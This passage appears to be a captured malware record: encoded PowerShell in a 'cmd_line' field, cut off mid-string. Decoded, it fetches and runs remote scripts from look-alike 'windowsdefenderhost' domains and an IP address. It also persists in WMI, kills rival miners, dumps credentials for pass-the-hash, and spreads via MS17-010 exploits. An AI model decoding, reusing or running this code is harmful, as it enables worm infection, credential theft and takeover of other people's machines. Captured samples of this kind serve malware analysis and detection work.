AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIA